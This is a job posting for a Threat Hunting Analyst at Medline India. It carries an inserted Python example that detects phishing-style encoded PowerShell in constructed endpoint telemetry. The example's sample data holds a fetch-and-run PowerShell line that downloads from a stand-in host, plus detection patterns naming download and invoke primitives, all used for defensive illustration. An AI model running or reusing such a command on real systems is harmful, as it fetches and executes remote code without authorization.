Title: Threat Hunting Analyst
About Medline:
About Medline India:
Medline India was set up in 2010 in Pune, primarily as an offshore development centre and to augment resources for Medline Industries LP, headquartered in Chicago, USA. We are a 1500+ strong and growing team of technology, finance and business support professionals who support our businesses worldwide towards a mission to make healthcare run better. We are an organization with a conducive work environment and ample opportunities to learn, contribute and grow with a highly empowered and engaged team. We encourage our people to share their best ideas and create new opportunities for our customers and ourselves to work together to solve today's toughest healthcare challenges.
About Medline Industries, LP:
Established in 1966, Medline Industries LP is a renowned global healthcare organization boasting 56 years of consecutive sales growth, exceeding $21 billion in annual sales. With a workforce of over 36,000 professionals spread across the globe, we operate in more than 125 countries and territories. As the largest privately held manufacturer and distributor of medical supplies in the United States, Medline is uniquely positioned to offer comprehensive products, education, and support across the continuum of care.
At present, Medline Industries, LP holds the esteemed position as the #1 market leader, delivering an extensive portfolio of over 550,000 medical products and clinical solutions. Our clientele includes hospitals, extended care facilities, surgery centres, physician offices, home care agencies, providers, and retailers.
We're proud to be recognized by Forbes as one of America's Best Large Employers and Best Employers for Women. Additionally, the Chicago Tribune has consistently named us a Top Workplace for the past 12 years.
Job Description:
The Threat Hunting Analyst performs a wide variety of security duties with a primary focus on threat actor tactics, techniques, and procedures (TTPs). The ability to manage multiple simultaneous threat hunts spanning several platforms and covering various TTPs is a key function of this role. Knowledge sharing and mentoring of team members is a critical and necessary skill. Must have the ability to operate under pressure and steer the team dynamic when responding to incidents. Should be able to enhance and improve the team and its processes over time in a structured, well-established manner.
Roles and responsibilities:
- Perform hypothesis-based threat hunts using the MITRE ATT&CK framework
- Perform intel-based threat hunting
- Conduct threat simulation exercises to test current security controls
- Create Diamond Models to model threat activity
- Work directly with leadership to develop and improve existing internal processes
- Develop new processes that add value to the threat hunting team
- Provide proactive assistance to junior analysts to help them develop their skillset
- Develop advanced correlation rules for threat detection using CQL (CrowdStrike Query Language)
- Create and utilize threat intel reports to conduct manual hunts across available data sources
- Perform static and dynamic analysis of malicious files
- Work proactively on critical security incidents
- Perform vulnerability review and risk assessment
- Core experience with CrowdStrike or Splunk
- L3-level experience in security incident investigation: investigate, recommend and take decisions on incidents, and work with leadership
- Manage end-to-end security incident investigations
- Experience applying the MITRE ATT&CK framework (mapping observed activity to tactics and techniques)
- Basic knowledge of vulnerability analysis and risk assessment
- Manual hunt:
- Actively search for threats that automated security tools may not have detected.
- Detect hidden or undisclosed threats using advanced techniques and tools.
- Develop hypotheses about potential threats based on threat intelligence and industry trends.
- Perform in-depth analysis of network and system data to uncover indicators of compromise (IOCs) and APT activity.
- Work closely with other cybersecurity teams to improve detection capabilities and share findings.
- High level of scripting proficiency (e.g. Python, PowerShell) to automate threat hunting tasks.
- Analyze the attacker's tactics, techniques, and procedures (TTPs) in depth.
- Advanced Threat Detection
- Scripting and Programming Knowledge
- Advanced PowerShell, Bash, and Cmd Analysis
- Threat Intelligence, Malware Analysis, Vulnerability Analysis, Cloud Security, Data Analysis
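The responsibilities above describe the hunt loop in the abstract: turn a piece of threat intelligence into a hypothesis, express it as correlation rules mapped to ATT&CK techniques, run them over telemetry, and escalate hosts where the rules line up. The following is an added example, written for this page and not code from Medline or the posting itself; it runs that loop over a handful of constructed process-creation events (the `ts|host|parent_image|image|cmdline` format, the rule names R1/R2 and the hostnames are all assumptions made for the example). In a real environment the two rules would be written in SPL or CQL against EDR or SIEM data; the Python here shows the logic they would encode.

```python
"""Hypothesis-driven hunt over constructed endpoint process telemetry (added example).

Hypothesis (from intel): phishing-delivered Office macros spawn PowerShell with an
encoded command. Two rules encode it, each tagged with the ATT&CK technique it covers:
  R1  an Office application is the parent of a script interpreter   (T1059, via T1566.001)
  R2  PowerShell runs with -EncodedCommand and the decoded payload     (T1059.001 / T1027)
      contains download/invoke primitives
A host that matches both rules within a short window is escalated for investigation.
"""
import base64
import re
from collections import defaultdict
from datetime import datetime, timedelta

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# -enc / -e / -ec / -EncodedCommand followed by a base64 blob (PowerShell accepts the short forms)
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:enc(?:odedcommand)?|e|ec)\s+([A-Za-z0-9+/=]{16,})")
SUSPICIOUS_PS = re.compile(r"(?i)(downloadstring|invoke-expression|\biex\b|frombase64string|net\.webclient)")
RULES = {"R1": "T1059 (Office parent spawning interpreter)", "R2": "T1059.001 + T1027 (encoded PowerShell)"}


def parse_event(line):
    """Parse 'ts|host|parent_image|image|cmdline' (constructed format, not a vendor schema)."""
    ts, host, parent, image, cmdline = line.split("|", 4)
    basename = lambda p: p.lower().rsplit("\\", 1)[-1]
    return {"ts": datetime.fromisoformat(ts), "host": host,
            "parent": basename(parent), "image": basename(image), "cmdline": cmdline}


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE) or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def rule_office_spawn(ev):
    return ev["parent"] in OFFICE_APPS and ev["image"] in INTERPRETERS


def rule_encoded_ps(ev):
    if ev["image"] not in {"powershell.exe", "pwsh.exe"}:
        return False
    decoded = decode_encoded_command(ev["cmdline"])
    return decoded is not None and bool(SUSPICIOUS_PS.search(decoded))


def hunt(lines, window=timedelta(minutes=5)):
    """Run both rules per host; return (escalated hosts, {host: rules that fired})."""
    per_host = defaultdict(list)  # host -> [(timestamp, rule_id)]
    for line in lines:
        ev = parse_event(line)
        if rule_office_spawn(ev):
            per_host[ev["host"]].append((ev["ts"], "R1"))
        if rule_encoded_ps(ev):
            per_host[ev["host"]].append((ev["ts"], "R2"))
    escalated = []
    for host, obs in per_host.items():
        r1 = [t for t, r in obs if r == "R1"]
        r2 = [t for t, r in obs if r == "R2"]
        # correlation: both rules on the same host within the window
        if any(abs(a - b) <= window for a in r1 for b in r2):
            escalated.append(host)
    return sorted(escalated), {h: sorted({r for _, r in o}) for h, o in per_host.items()}


# Constructed sample telemetry. The encoded blobs are generated here so the round trip is exact.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
ENC = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
BENIGN = base64.b64encode("Get-Date".encode("utf-16-le")).decode()
OFFICE = r"C:\Program Files\Microsoft Office\root\Office16"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    rf"2024-05-01T10:00:05|ws-fin-07|{OFFICE}\WINWORD.EXE|{PS}|powershell.exe -nop -w hidden -enc {ENC}",
    rf"2024-05-01T10:03:40|ws-eng-12|C:\Windows\explorer.exe|{PS}|powershell.exe -enc {BENIGN}",
    rf"2024-05-01T10:07:12|ws-eng-12|{OFFICE}\EXCEL.EXE|C:\Windows\System32\cmd.exe|cmd.exe /c whoami",
    rf"2024-05-01T09:10:00|srv-db-01|C:\Windows\System32\services.exe|{PS}|powershell.exe -ExecutionPolicy Bypass -e {ENC}",
    rf"2024-05-01T10:30:00|srv-db-01|{OFFICE}\OUTLOOK.EXE|C:\Windows\System32\wscript.exe|wscript.exe invoice.vbs",
]

if __name__ == "__main__":
    escalated, summary = hunt(SAMPLE_EVENTS)
    for host, fired in summary.items():
        print(host, [f"{r}: {RULES[r]}" for r in fired])
    print("escalate:", escalated)
```

Only `ws-fin-07` is escalated: it is the one host where R1 and R2 fire within the window. `srv-db-01` trips both rules but eighty minutes apart, so it stays a lower-priority lead rather than an escalation, and `ws-eng-12`'s encoded `Get-Date` shows why the rule decodes the payload instead of alerting on the `-enc` flag alone.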
Required skills:
- Ability to perform threat hunting using the MITRE ATT&CK framework
- Ability to identify, detect and explain malicious activity occurring within environments with a high level of accuracy and confidence
- Ability to develop advanced correlation rules for threat detection. Must have expertise in writing queries in SPL (Search Processing Language, used by Splunk) or CQL (CrowdStrike Query Language)
- Ability to create threat intelligence reports based on available threat intel
- Ability to perform static and dynamic analysis of possible malicious files
- Ability to perform Vulnerability analysis and risk assessment
- Should have strong log analytical skills
- Should be able to demonstrate good incident response skills in case of critical security incidents
- Moderate understanding of Windows and Linux operating systems, as well as command line tools
- Strong verbal as well as written communication skills
- Basic understanding of malware analysis
Years of experience: 5+ years in Security Operations and Threat Hunting (minimum 2 years in threat hunting)
Tools - CrowdStrike, Splunk, LogScale (formerly Humio)
Certification:
- GIAC / Offensive Security certifications preferred
- Certified Threat Hunting Professional (CTHP): an advanced certification for threat hunters
- Certified Threat Intelligence Analyst (C|TIA)
- GIAC Cyber Threat Intelligence (GCTI)
One of CTHP, C|TIA or GCTI is a must-have.
Programming language - Python (good to have)
Qualification: Bachelor of Engineering in any stream